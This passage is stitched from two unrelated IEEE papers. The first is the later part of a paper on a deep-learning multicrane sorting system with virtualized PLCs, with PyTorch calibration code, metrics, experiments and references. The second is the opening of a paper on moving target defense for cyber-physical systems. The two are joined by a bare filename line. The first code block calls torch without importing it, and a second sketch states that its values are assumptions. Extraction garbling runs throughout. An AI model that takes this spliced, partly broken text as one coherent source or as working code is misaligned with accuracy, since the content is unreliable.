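import torch.nn as nn

# Layer widths from the text / Fig. 8: input (u, v, 1) ... output (Xw, Yw, Zw).
widths = [3, 10, 24, 48, 96, 192, 96, 48, 24, 3]

layers = []
for w_in, w_out in zip(widths[:-1], widths[1:]):
    # ReLU after every layer, including the output, following (9)-(11).
    layers += [nn.Linear(w_in, w_out), nn.ReLU()]
bp_net = nn.Sequential(*layers)

criterion = nn.MSELoss()                                       # eq. (12), averaged over the batch
optimizer = torch.optim.Adam(bp_net.parameters(), lr=1e-3)     # optimizer/lr are assumptions

def train_step(pixels_h, world_xyz):
    """One update on a minibatch of homogeneous pixel points (u, v, 1) -> (Xw, Yw, Zw)."""
    optimizer.zero_grad()
    loss = criterion(bp_net(pixels_h), world_xyz)
    loss.backward()
    optimizer.step()
    return loss.item()

# Toy batch of (interpolated) checkerboard correspondences; values are placeholders.
pix = torch.tensor([[420.0, 310.0, 1.0], [455.0, 310.0, 1.0]])
wld = torch.tensor([[5.0, 5.0, 0.0], [10.0, 5.0, 0.0]])
print(train_step(pix, wld))
```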
TABLE I. Linear interpolation-based BP neural-network algorithm.
The processing approach of the linear interpolation-based BP neural network is shown in Table I. First, the dataset is obtained from the linear interpolation method. Then, the data are sent to the network and the error is calculated. Next, the parameters for each episode are updated through the BP algorithm. Finally, the world coordinates of all objects are obtained for each frame. After training, we can obtain the loss function curve to observe the algorithmic performance, which will be shown in Section IV.
F. Evaluation Methods
In general, precision, recall, and mean average precision (mAP) are utilized as the standard methods for evaluating object detection performance [42]. The formulae of the precision and recall rate are given as follows:
$$\mathrm{Precision}\,(\%) = \frac{TP}{TP + FP} \times 100 \qquad (13)$$
$$\mathrm{Recall\ Rate}\,(\%) = \frac{TP}{TP + FN} \times 100 \qquad (14)$$
where TP denotes the true positives, i.e., the number of correctly detected items; FP represents the false positives, i.e., the number of negative samples predicted as positive (the commission error); and FN denotes the false negatives, i.e., the number of positive samples predicted as negative (the omission error). Precision is defined as the ratio of true-positive detections to all detections. The recall rate reflects the sensitivity of the detector.
The per-class AP is given by the area under the precision-recall rate curve for the detection results, and mAP is the mean AP over all classes. The mAP value reflects the performance of the corresponding object detectors. Their formulae are summarized as follows:
$$\mathrm{AP}\,(\%) = \sum_{n=1}^{N} p(n)\,\Delta r(n) \qquad (15)$$
$$\mathrm{mAP}\,(\%) = \frac{\sum_{q=1}^{Q}\mathrm{AP}_{q}}{Q} \qquad (16)$$
where $\Delta r(n)$ is the distance between adjacent points on the recall-rate axis, $p(n)$ is the value of the precision axis corresponding to the points on the recall-rate axis, $N$ is the number of points, and $Q$ is the total number of classes.
IV. EXPERIMENTS AND RESULTS
A. Experimental Platform of Multicrane Visual Sorting System
In a multicrane visual sorting system, the operation state, movement direction, speed, and other parameters of the conveyor belt and cranes need to be controlled to achieve controllable material sorting. An experimental structure for the multicrane visual sorting system is established, as shown in Fig. 9, which realizes industrial closed-loop control integrating C-PLC and AI technology.
Fig. 9. Experimental structure of multicrane visual sorting system.
The scanning cycle of the C-PLC is 100 ms according to the running programs. One F-vPLC in IPC1 is responsible for controlling one crane with the EtherCAT protocol, and two F-vPLCs in IPC2 are responsible for controlling another crane with the EtherCAT protocol and the conveyor belt with the Modbus protocol. The scanning cycle of an F-vPLC is 20 ms. The scanning cycle of the UDP packet from the C-PLC to the F-vPLCs is 50 ms. The servomotor is a DS5C series module, which drives the cranes to reach the position of the material. The frequency of the frequency converter in the conveyor belt system ranges from 7.5 to 30 Hz.
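Because the C-PLC works from NTP-aligned timestamps (Section III-A), it can advance a detected material's coordinate by the elapsed time and the belt speed before commanding a crane. The following simplified sketch illustrates that time-difference calculation; the belt direction, variable names, and delay values are assumptions, not the authors' control code.

```python
import time

BELT_SPEED_M_PER_MIN = 5.2   # example conveyor speed set in the UI (m/min)
BELT_SPEED_CM_PER_S = BELT_SPEED_M_PER_MIN * 100.0 / 60.0

def crane_target(world_y_cm, t_detect, pickup_delay_s=0.0, t_now=None):
    """Estimate where a detected material will be along the belt axis (cm).

    world_y_cm : coordinate reported by the calibration module at detection time
    t_detect   : NTP-aligned timestamp attached by the AI server
    The material keeps moving while the result travels to the C-PLC and the crane
    accelerates, so the coordinate is advanced by the elapsed time.
    """
    if t_now is None:
        t_now = time.time()
    elapsed = (t_now - t_detect) + pickup_delay_s
    return world_y_cm + BELT_SPEED_CM_PER_S * elapsed

# Example: a piece detected 0.5 s ago at 10 cm, with 0.3 s of crane motion still to go.
print(round(crane_target(10.0, time.time() - 0.5, pickup_delay_s=0.3), 1))
```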
Ten C-PLCs are deployed on X86 server and one of them is applied to the visual sorting system.We present and discuss the experimental results obtained for the running performance of the visual recognition module, camera calibration module, and material sorting system as follows. B. User Interface (UI) of Multicrane Visual Sorting System The UI of the multicrane visual sorting system is shown in Fig. 10, which mainly consists of crane setting module, convey control module, vision state module, style setting module, and crane working state module. The crane setting module is respon-sible for working range in the X-axis and adjusting the velocity Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3733 Fig. 10. UI of multicrane visual sorting system. and acceleration of the crane. Convey control module aims to control the state that includes run and stop, and the speed of the conveyor belt. The vision state module is used to monitor thecommunication connection status between C-PLC server and AI server by the indicator. Delay is the data transmission time from the camera to C-PLC server, which includes theimage transmission time from the camera to AI server, the visual processing time on AI server, and the result transmission from AI server to C-PLC server. The style setting module isdesigned to place materials in arbitrary shape for each crane according to customer requirements. The crane working state module dynamically displays the current position and movementof the crane along the X-axis in real time. UI is used to monitor the running status of the whole multicrane system and facilitate the user to set the parameters of the system. C. Results of Material Vision Detection A comparative experiment involving faster R-CNN, YOLOv3, and YOLOv5 is designed and deployed on PyTorch using NVIDIA 3090 graphics processing units. To improve the robustness of the system, data augmentation methods are utilized on the original images, including scaling, color space adjustments, and mosaic augmentation. The number ofepochs is 1000 and the batch size is 1 due to the limited dataset. Adam optimizer [43] is utilized for learning the dramatic representations. The initial learning rate is 0.001. We collect201 images that consist of red chess pieces and black chess pieces. The number of chess pieces is random in each image. More speci cally, 141 images are selected for the training set,30 images are selected for the testing set, and the other 30 images belong to the validating set. After training and testing, the precision, recall rate, and mAP are obtained on the training set, the testing set, and the validating set, which are presented in Table II. YOLOv5 achieves the best performance in terms of mAP on the training set and thevalidating set. Faster R-CNN performs similarly to YOLOv5, the precision and recall rate of which are close to 100% on the training set and the testing set. YOLOv3 is the worst one on three datasets. The overall results prove the effectiveness of YOLOv5 for object detection.TABLE II RESULTS OF FASTER R-CNN, YOLO V3,AND YOLO V5ON THE TRAINING SET,TESTING SET,AND VALIDATING SET Fig. 11. Processing time of per image on faster R-CNN, YOLOv3, and YOLOv5. The processing times per image for the three algorithms are presented in Fig. 11. 
Faster R-CNN and YOLOv3 consume 35.82 and 13.64 ms to obtain the position information. YOLOv5 processes one image in 12.15 ms, which is 23.67 and 1.49 ms faster than faster R-CNN and YOLOv3, respectively. This fur- ther proves the signi cant performance of YOLOv5 in themulticrane visual sorting system. Considering the accuracy and time consumption, we choose YOLOv5 as the visual recognition algorithm and use the recognition results of YOLOv5 to continuecamera calibration. Fig. 12illustrates the visual recognition performance on YOLOv5. The data on the images represent the con dencescores, each of which is the similarity of the predicted bounding box and the corresponding truth bounding box. All con dence scores are close to 1, which further demonstrates that YOLOv5performs excellently in the virtual sorting system. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3734 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Fig. 12. Illustration of the visual recognition results based on YOLOv5. TABLE III EXAMPLE OF AAND (R,T)FOR ONECHECKBOARD ABOUT TRADITIONAL CAMERA CALIBRATION D. Results of Camera Calibration Ten 5 cm 5 cm square checkerboards are designed for training and three 5 cm 5 cm square checkerboards are used for testing. On one checkboard, there are 120 points for traditional calibration and BP with base calibration, and 437 points for BP with linear interpolation calibration. The resolution of the cam-era is 1920 1080. First, the traditional camera calibration is conducted and the parameter matrix ( A,R,T) of one checkboard is shown in Table III. Five points are presented in the world coordinate system to illustrate the performance of traditional calibration and BP without and with linear interpolation. The distance error of these ve points is shown in Table IV.(u, v) are the pixel coordinates, (X, Y ) are the truth world coordinates, and ( X /prime,Y/prime)a r et h e predicted coordinates from three algorithms. BP with linearinterpolation performs better than the traditional calibration. The average distance error of BP with linear interpolation is 0.017 cm, which is 0.041 and 0.109 cm less than that of thetraditional calibration and BP without linear interpolation, which demonstrates the effectiveness of the proposed method. The comparison between the training loss of BP neural net- work with the base calibration and linear interpolation calibra- tion is shown in Fig. 13.T h e X-axis represents 400 epochs, and the Y-axis is the MSE loss for the training dataset. We canFig. 13. MSE loss comparison of BP with and without linear interpola- tion. Fig. 14. Distance error comparison of traditional calibration, BP with- out and with linear interpolation on three images. determine that the convergence speed of linear interpolation is faster than that of base calibration. The MSE loss of the 400th epoch is 0.417 for base calibration and 0.175 for linear interpolation calibration. Therefore, linear interpolation-basedcalibration performs better than base calibration in terms of convergence speed and accuracy. The distance error comparison of traditional calibration, BP without and with linear interpolation, is presented in Fig. 14, which captures three images for testing. The X-axis shows three images that are captured in different positions and the Y-axis is the average value of the distance error for each image. 
BP with linear interpolation achieves the best performance, and the average distance error is 0.007 cm, which is lower by 0.067 and 0.02 cm for all images. This further proves the signi cance of BP with linear interpolation for camera calibration in the virtualsorting system. E. Experimental Results of the Whole Visual Sorting System in the Virtualized PLCs Environment After camera calibration, C-PLC receives (world coordinates, types, and timestamps) from the server and sends commands to the F-vPLCs that control the cranes to suck the materials. In the experiment, we use two kinds of chess pieces instead of theindustrial items due to the load bearing capacity of the cranes and the suction capacity of the air pumps. One crane that is responsible for sorting the red chess pieces and putting them into the red box can work in coordination with another crane that is responsible for sorting the black chess pieces and puttingthem into the black box. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3735 TABLE IV DISTANCE ERROR OF TRADITIONAL CALIBRATION ,B PW ITHOUT AND WITHLINEAR INTERPOLATION Fig. 15. Undetected rate of red chesses and black chesses under different conveyor belt speeds. Fig. 16. Accuracy and time requirements of the multicrane sorting system under different conveyor belt speeds. The undetected rates of red and black chess pieces are shown in Fig. 15. The performance is compared under different con- veyor belt speeds, which are set to 1.5, 2.8, 4.0, and 5.2 m/min. A total of 200 chess pieces are placed on the conveyor belt for one test. There are 100 red chess pieces and 100 black chess pieces.The performance of the crane sorting system gradually degrades Fig. 17. Experimental diagram of the crane visual sorting system. with increasing speed. The best undetected rate result is 0.035, which is obtained under a speed of 1.5 m/min and is 0.07 lower than the undetected rate of 5.2 m/min. The working process of the mechanical arm includes acceleration and deceleration, whichcauses jitter. The reason for missed detections is that the crane cannot pick up all chess pieces if the conveyor belt is running too fast. Hence, the stability and reliability of the crane systemshould be improved in the fast-running scene, especially with more materials that need to be sorted on the conveyor belt. The accuracy and time requirements of the whole crane sort- ing system under different conveyor belt speeds are shown in Fig. 16. The accuracy is the ratio of the number of correctly detected chess pieces to 200. The time is calculated by the timeconsumed for sorting 200 chesses for one testing result. The best accuracy performance at 1.5 m/min is 96.5%, which is 7% higher than the accuracy achieved at 5.2 m/min. The time spentunder 1.5 m/min is 3.424 s, which is an increase of 1.115 s over the time spent at 5.2 m/min. The time to extract each chess piece is approximately 3.432 s when the belt is moving at 1.5 m/min, which satis es most industrial applications. With the increase in speed, the accuracy and time present opposite trends, thereason for which is the same as that of the undetected rate. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3736 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 
20, NO. 3, MARCH 2024 main in uencing factors are the movement process of the me- chanical arm, which leads to massive jitter, and the fact that the air pump cannot support the amount of needed air in the fast- sorting scene. We can appropriately adjust the running speed to meet industrial requirements according to realistic applications. The experimental results of the crane visual sorting system are shown in Fig. 17. Two kinds of chess pieces are correctly sorted into the designated boxes in real time. V. C ONCLUSION In this article, a multicrane visual sorting system based on deep learning with virtualized PLCs was investigated, where two cranes can cooperate to sort materials on a conveyor belt in real time. C-PLCs and F-vPLCs were employed in the cloud and the eld to assist the cooperation of two cranes in a TSN envi- ronment to achieve highly reliable and stable communication. A YOLOv5-based visual recognition architecture was introduced to locate the materials and obtain their types. To determine the precise coordinates of the materials in the crown coordinate sys- tem, a new linear interpolation-based BP network was proposed to provide the relation between the pixel coordinate system and the world coordinate system. We demonstrate the performance of the proposed scheme based on real sorting datasets. For future work, many potential and viable applications with intelligent algorithms can utilize the proposed scheme. We will employ C-PLC in 5G mobile edge computing [44] and control the crane visual sorting system to meet the application requirements in the industry. REFERENCE [1] R. Y . Zhong, X. Xu, E. Klotz, and S. T. Newman, Intelligent manufac- turing in the context of industry 4.0: A review, Engineering , vol. 3, no. 5, pp. 616 630, 2017. [2] C. Zhang and Y . Lu, Study on arti cial intelligence: The state of the art and future prospects, J. Ind. Inf. Integr. , vol. 23, 2021, Art. no. 100224. [3] J. Chen, K. Li, Keqin Li, P. S. Yu, and Z. Zeng, Dynamic planning of bicycle stations in dockless public bicycle-sharing system using gated graph neural network, ACM Trans. Intell. Syst. Technol. , vol. 12, no. 2, 2021, Art. no. 25. [4] A. Mahmood et al., Industrial IoT in 5G-and-beyond networks: Vision, architecture, and design trends, IEEE Trans. Ind. Inform. , vol. 18, no. 6, pp. 4122 4137, Jun. 2022. [5] X. Li, J. Wan, H.-N. Dai, M. Imran, M. Xia, and A. Celesti, A hybrid computing solution and resource scheduling strategy for edge comput- ing in smart manufacturing, IEEE Trans. Ind. Inform. , vol. 15, no. 7, pp. 4225 4234, Jul. 2019. [6] A. G. Frank, L. S. Dalenogare, and N. F. Ayala, Industry 4.0 technologies: Implementation patterns in manufacturing companies, Int. J. Prod. Econ. , vol. 210, pp. 15 26, 2019. [7] M.-F. K rner et al., Extending the automation pyramid for industrial demand response, Procedia CIRP , vol. 81, pp. 998 1003, 2019. [8] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A veri cation platform for programmable logic controllers, in Proc. IEEE/ACM 27th Int. Conf. Autom. Softw. Eng. , 2012, pp. 338 341. [9] M. A. Sehr et al., Programmable logic controllers in the context of industry 4.0, IEEE Trans. Ind. Inform. , vol. 17, no. 5, pp. 3523 3533, May 2021. [10] Y . Wang, K. Hong, J. Zou, T. Peng, and H. Yang, A CNN-based visual sorting system with cloud-edge computing for exible manufacturing sys- tems, IEEE Trans. Ind. Inform. , vol. 16, no. 7, pp. 4726 4735, Jul. 2020. [11] B. Pu, K. Li, S. Li, and N. 
Zhu, Automatic fetal ultrasound standard plane recognition based on deep learning and IIoT, IEEE Trans. Ind. Inform. , vol. 17, no. 11, pp. 7771 7780, Nov. 2021. [12] L. Liu et al., Deep learning for generic object detection: A survey, Int. J. Comput. Vis. , vol. 128, no. 2, pp. 261 318, 2020.[13] L. Song, W. Wu, J. Guo, and X. Li, Survey on camera calibration tech- nique, in Proc. IEEE 5th Int. Conf. Intell. Human-Mach. Syst. Cybern. , 2013, pp. 389 392. [14] S. C. Park, C. M. Park, and G. N. Wang, A PLC programming environment based on a virtual plant, Int. J. Adv. Manuf. Technol. , vol. 39, no. 11, pp. 1262 1270, 2008. [15] S. C. Park and M. Chang, Hardware-in-the-loop simulation for a produc- tion system, Int. J. Prod. Res. , vol. 50, no. 8, pp. 2321 2330, 2012. [16] T. Goldschmidt, M. K. Murugaiah, C. Sonntag, B. Schlich, S. Bial- las, and P. Weber, Cloud-based control: A multi-tenant, horizontally scalable soft-PLC, in Proc. IEEE 8th Int. Conf. Cloud Comput. , 2015, pp. 909 916. [17] W. Mahnke, S. H. Leitner, and M. Damm, OPC Uni ed Architecture . Berlin, Germany: Springer, 2009. [18] S. Kalle, N. Ameen, H. Yo, and I. Ahmed, CLIK on PLCs! Attacking control logic with decompilation and virtual PLC, in Proc. Workshop Binary Anal. Res. , 2019, pp. 1 12. [19] J. Chen, K. Li, K. Bilal, X. Zhou, K. Li, and P. S. Yu, A bi-layered parallel training architecture for large-scale convolutional neural networks, IEEE Trans. Parallel Distrib. Syst. , vol. 30, no. 5, pp. 965 976, May 2019. [20] Z. Zou et al., Object detection in 20 years: A survey, Proc. IEEE , vol. 111, no. 3, pp. 257 276, Mar. 2023. [21] J. Redmon, S. Divvala, R. Girshick, and A. Farhadi, You only look once: Uni ed, real-time object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2016, pp. 779 788. [22] W. Liu et al., SSD: Single shot multibox detector, in Proc. Eur. Conf. Comput. Vis. , 2016, pp. 21 37. [23] S. Ren, K. He, R. Girshick, and J. Sun, Faster R-CNN: Towards real-time object detection with region proposal networks, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 39, no. 6, pp. 1137 1149, Jun. 2017. [24] C. Chen, C. Wang, B. Liu, C. He, L. Cong, and S. Wan, Edge intel- ligence empowered vehicle detection and image segmentation for au- tonomous vehicles, IEEE Trans. Intell. Transp. Syst. , to be published, doi: 10.1109/TITS.2022.3232153 . [25] Y . Song, L. Gao, X. Li, and W. Shen, A novel robotic grasp detec- tion method based on region proposal networks, Robot. Comput.-Integr. Manuf. , vol. 65, 2020, Art. no. 101963. [26] G. Jocher et al., yolov5, Code repository, 2020. [Online]. Available: https://github.com/ultralytics/yolov5 [27] Y . Hold-Geoffroy et al., A perceptual measure for deep single image cam- era calibration, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 2354 2363. [28] Z. Zhang, A exible new technique for camera calibration, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 22, no. 11, pp. 1330 1334, Nov. 2000. [29] C. A. I. Sheng, L. I. Qing, and Q. Yan-feng, Camera calibration of attitude measurement system based on BP neural network, J. Optoelectron. Laser , vol. 18, no. 7, pp. 832 834, 2007. [30] S. N. Raza et al., Arti cial intelligence based camera calibration, inProc. 15th Int. Wireless Commun. Mobile Comput. Conf. , 2019, pp. 1564 1569. [31] S. Sudhakaran, K. Montgomery, M. Kashef, D. Cavalcanti, and R. Can- dell, Wireless time sensitive networking impact on an industrial col- laborative robotic workcell, IEEE Trans. Ind. Inform. , vol. 18, no. 10, pp. 
7351 7360, Oct. 2022. [32] C. Gomez, A. Arcia-Moret, and J. Crowcroft, TCP in the Internet of Things: From ostracism to prominence, IEEE Internet Comput. , vol. 22, no. 1, pp. 29 41, Jan./Feb. 2018. [33] C. DeCusatis, R. M. Lynch, W. Kluge, J. Houston, P. A. Wojciak, and S. Guendert, Impact of cyberattacks on precision time protocol, IEEE Trans. Instrum. Meas. , vol. 69, no. 5, pp. 2172 2181, May 2020. [34] C.-Y . Wang, H.-Y . M. Liao, Y .-H. Wu, P.-Y . Chen, J.-W. Hsieh, and I.-H. Yeh, CSPNet: A new backbone that can enhance learning capability of CNN, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. Work- shops , 2020, pp. 1571 1580. [35] J. Redmon, DarkNet: Open source neural networks in C, 2013. [Online]. Available: http://pjreddie.com/darknet/ [36] S. Liu, L. Qi, H. Qin, J. Shi, and J. Jia, Path aggregation network for instance segmentation, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 8759 8768. [37] T.-Y . Lin, P. Dollar, R. Girshick, K. He, B. Hariharan, and S. Belongie, Feature pyramid networks for object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2017, pp. 936 944. [38] H. Rezato ghi, N. Tsoi, J. Gwak, A. Sadeghian, I. Reid, and S. Savarese, Generalized intersection over union: A metric and a loss for bounding box regression, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2019, pp. 658 666. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3737 [39] I. Chamveha et al., Automated cardiothoracic ratio calculation and cardiomegaly detection using deep learning approach, 2020, arXiv:2002.07468 . [40] V . Nair and G. E. Hinton, Recti ed linear units improve restricted Boltz- mann machines, in Proc. Int. Conf. Mach. Learn. , 2010, pp. 807 814. [41] M. Mathieu, C. Couprie, and Y . LeCun, Deep multi-scale video prediction beyond mean square error, 2015, arXiv:1511.05440 . [42] P. Henderson and V . Ferrari, End-to-end training of object class detectors for mean average precision, in Proc. Asian Conf. Comput. Vis. , 2016, pp. 198 213. [43] D. P. Kingma et al., Adam: A method for stochastic optimization, 2014, arXiv:1412.6980 . [44] F. Spinelli and V . Mancuso, Toward enabled industrial verticals in 5G: A survey on MEC-based approaches to provisioning and exibility, IEEE Commun. Surveys Tut. , vol. 23, no. 1, pp. 596 630, Jan./Mar. 2021. Meixia Fu received the B.S. degree in commu- nication engineering from the Qingdao Univer-sity of Science and Technology, Qingdao, China, in 2014, and the Ph.D. degree in information and communication engineering from the Bei-jing University of Posts and Telecommunica-tions, Beijing, China, in 2021. She is currently a Postdoctoral Research As- sociate with the University of Science and Tech-nology, Beijing, China. Her research interests include industrial Internet of Things, intelligent manufacturing, environmental perception, arti cial intelligence, com-puter vision, and image processing. Zhenqian Wang received the B.Eng. degree majored in intelligent science and technology during the undergraduate period in 2021 fromthe School of Automation, University of Scienceand Technology, Beijing, China, where he is currently working toward the master s degree in electronic information with the Institute of Indus-trial Internet. 
His current research interests include indus- trial Internet of Things, intelligent manufactur- ing, computer vision, deep learning, and depth estimation. Jianquan Wang received the doctoral degree in communication engineering from the BeijingUniversity of Posts and Telecommunications,Beijing, China, in 2003. Since 2020, he has been a Professor with the University of Science and Technology, Beijing,China. He is the leader of scienti c and techno-logical innovation of the National Ten Thousand Talents Program, the young and middle-aged leading talents of the Ministry of Science andTechnology, the expert enjoying the special al- lowance of the State Council. He presided over and participated in more than ten special projects, including 863, NSFC, major projectssupported by the Ministry of Science and Technology, National Scienceand Technology major special projects. More than 100 articles have been published, more than 40 invention patents have been authorized; more than 60 international standard manuscripts have been submitted.He is interested in researching in Industrial Internet and heterogeneousnetwork collaboration, network system, key technology, and network security. Qu Wang received the B.S. degree in informa- tion and communication engineering from the School of Software Engineering, Beijing Univer- sity of Posts and Telecommunication, Beijing,China, in 2014, the M.S. degree in informationand communication engineering from the Uni- versity of Chinese Academy of Sciences, Bei- jing, China, in 2017, and the Ph.D. degree in in-formation and communication engineering fromthe Beijing University of Posts and Telecommu- nications, Beijing, China, in 2021. He is currently an Associate Professor with the University of Science and Technology, Beijing, China. His research interests include location-based services, context awareness, pervasive computing, industrial In- ternet of Things, and arti cial intelligence. Zhangchao Ma received the bachelor s and doctor s degrees in communication engineer- ing from the Beijing University of Posts and Telecommunications, Beijing, China, in 2002and 2011, respectively. From 2017 to 2020, he was with Guoke Quan- tum Communication Network Company Ltd. From 2011 to 2017, he was with the NetworkTechnology Research Institute, China UnicomResearch Institute, Beijing. Since May 2020, he has been an Associate Professor with the Uni- versity of Science and Technology Beijing, Beijing. He has participatedin multiple funded research grants, including National Major SpecialProjects. His research interests include researching in industrial delay sensitive network, network endogenous security, quantum secure com- munication, and B5G. Danshi Wang (Senior Member, IEEE) received the Ph.D. degree in electromagnetic eld and microwave technology from the Beijing Univer-sity of Posts and Telecommunications (BUPT),Beijing, China, in 2016. He is currently an Associate Professor with the State Key Laboratory of Information Photon-ics and Optical Communications, BUPT. He hasproposed and veri ed a series of AI-driven com- munication and network technology solutions, which has been applied to telecom operator and Internet service provider. He has authored or coauthored more than 160technical papers in international journals and conference, including 20 invited talks in ECOC/ACP/OECC/ICAIT. 
He has held and participated in multiple funded research grants, including the National Key R&DProgram of China, National Natural Science Foundation of China, andthe Fundamental Research Funds for the Central Universities. His re- search interests include intelligent communication and network, arti cial intelligence (AI), digital twin network, and AI for science. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply.
Moving_Target_Defense_for_CyberPhysical_Systems_Using_IoT-Enabled_Data_Replication.pdf
This article proposes a novel moving target defense (MTD) strategy that leverages the versatility of Internet of Things (IoT) networks to enhance the security of cyber-physical systems (CPSs) by replicating relevant sensory and control signals. The replicated data are randomly selected and transmitted to create two layers of uncertainties that reduce the ability of adversaries to launch successful cyberattacks, without affecting the performance of the system in normal operation. The theoretical foundations of designing the IoT network and optimally allocating replicas per signal are developed for linear time-invariant systems, and fundamental limits of the uncertainties introduced by the framework are calculated. The orchestration of the layers and applications integrated in the proposed framework is demonstrated in an experimental implementation on a real-time water system over a WiFi network, adopting a data-centric architecture. The implementation results demonstrate that the proposed framework considerably limits the impact of false-data-injection attacks, while decreasing the ability of adversaries to learn details about the physical system operation.
IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 13223 Moving Target Defense for Cyber Physical Systems Using IoT-Enabled Data Replication Jairo A. Giraldo ,Member, IEEE , Mohamad El Hariri ,Member, IEEE , and Masood Parvania ,Senior Member, IEEE Index Terms Cyber physical systems, cybersecurity, data replication, Internet of Things (IoT), moving target defense(MTD). I. I NTRODUCTION SECURING the computing and communication networks that monitor and control physical systems, collectively known as cyber physical systems (CPSs), is becoming a pri- ority as many systems and technologies, from the critical infrastructure (e.g., power and water networks), to cars, dronesand medical devices become more connected and controlled by software [1]. There are currently growing vulnerabilities threatening critical infrastructure CPSs, such as power plants,oil and gas pipelines, and water supplies [2], [3]. Moreover, recent sophisticated attacks have targeted industrial CPSs around the world, such as the CrashOverride incident [4], anda denial-of-service attack that left grid operators temporarily blinded to generation sites of several wind and solar farms in the U.S. [5]. One of the key factors to the success of Manuscript received 9 March 2021; revised 12 July 2021, 24 September 2021, and 13 November 2021; accepted 3 January 2022.Date of publication 20 January 2022; date of current version 25 July 2022. This work was supported in part by the Of ce of Naval Research under Grant N000141812395. (Corresponding author: Jairo A. Giraldo.) Jairo A. Giraldo and Masood Parvania are with the Department of Electrical and Computer Engineering, The University of Utah, Salt Lake City, UT 84112 USA (e-mail: [email protected]; [email protected]). Mohamad El Hariri is with the Department of Electrical Engineering, Colorado School of Mines, Golden, CO 80401 USA (e-mail: melhariri@ mines.edu). Digital Object Identi er 10.1109/JIOT.2022.3144937cyberattacks is the attackers ability to gain as much knowl- edge about the topology, architecture, and operation of the target CPS during the reconnaissance phase, which has proven effective due to the static nature of many modern-day com-puting systems [6]. The more knowledge an adversary gains, the more sophisticated and impactful attacks can be. Moving target defense (MTD) has been proposed as a secu- rity measure with the purpose of inducing control shifts and changes across multiple system dimensions in order to increase uncertainty, apparent complexity, costs for attackers, and coun-teract reconnaissance efforts [7], in order to make harder for the adversary to launch successful attacks. MTD was origi- nally developed for computer network security [8] [10], but several recent efforts have extended the MTD application to protect CPSs. A. Related Work MTD applications in CPS have been proposed in cyber and physical contexts. From a cyber perspective, different approaches have been proposed: data space randomization(DSR) that can detect various types of memory corruption attacks [11], [12]; IP-Hopping in SCADA networks to dynam- ically change the IP addresses of different devices in thenetwork [13]. A controller area network identi cation shuf- ing technique is introduced in [14] that can increase the dif culty for attackers to perform reconnaissance attacks inmodern vehicles. 
On the other hand, several efforts have focused on the development of theoretical foundations for different MTD strategies that particularly affect physical signals or physical connections to reveal stealthy attacks. In smart grids, MTD approaches for state estimation have focused on changing the physical topology of the power grid (e.g., by changing admittance) in order to reveal false-data-injection (FDI) attacks [15]–[18]. Giraldo et al. [19] and Giraldo and Cardenas [20] have proposed an MTD mechanism where the sensors' availability changes randomly over time, allowing the detection of stealthy attacks while limiting the disruption caused to the system. Similarly, the MTD strategies proposed in [21] and [22] consist of randomly switching among several controllers to increase the uncertainty perceived by the adversary. Griffioen et al. [23] included an external system unknown to the attacker that uses additional sensor readings, making it harder for the adversary to remain hidden.

Most of the MTD approaches for CPSs found in the literature focus on revealing sophisticated stealthy attacks at the cost of degrading the system performance. As a consequence, missing from the prior art surveyed above are MTD approaches that can simultaneously secure CPSs in different aspects, such as privacy and attack mitigation, without affecting the normal system operation. On the other hand, even though most efforts have introduced theoretical results to describe the potential benefits of MTD mechanisms [19], [21]–[23], little attention has been given to implementing the proposed strategies in order to evaluate their feasibility and scalability in a realistic context.

B. Contributions and Paper Organization

This article proposes a novel framework for MTD using IoT-enabled data replication (MTD-IDR), which exploits the flexibility and low cost of Internet of Things (IoT) devices to replicate relevant sensory and control signals from CPSs, and then randomly selects a subset of the replicated data to reach their destination. The design of the proposed MTD-IDR framework consists of a mixed-integer quadratically constrained programming (MIQCP) problem that takes into account the dynamic behavior of the physical system and the number of available IoT devices to optimally allocate the number of replicas associated to each signal in order to minimize the impact of cyberattacks. In addition, the MTD-IDR framework integrates two layers of uncertainty, namely, random replica activation, which selects a random subset of replicas to transmit at a given time, and random path selection, which selects which one of the transmitted replicas reaches its intended destination. These layers of uncertainty are able to limit the attacker's ability to learn the system model and simultaneously reduce the impact and success probability of FDI attacks. Furthermore, the proposed MTD-IDR approach utilizes a data-centric network architecture for seamless coordination between the IoT devices, sensors and controllers, and for ensuring scalability and interoperability.

The remainder of this article is organized as follows.
Section II presents an overview of the proposed MTD-IDR framework, along with the description of the private data exchange network, random replica activation, and random path selection layers. The formulation of the optimal replica allocation model is introduced in Section III. The proposed MTD-IDR framework is implemented and tested in Section IV on the real-time operation of a test quadruple tank process (QTP) over a WiFi network. Section V concludes this article.

II. MTD WITH IOT-ENABLED DATA REPLICATION: TWO LAYERS OF UNCERTAINTY

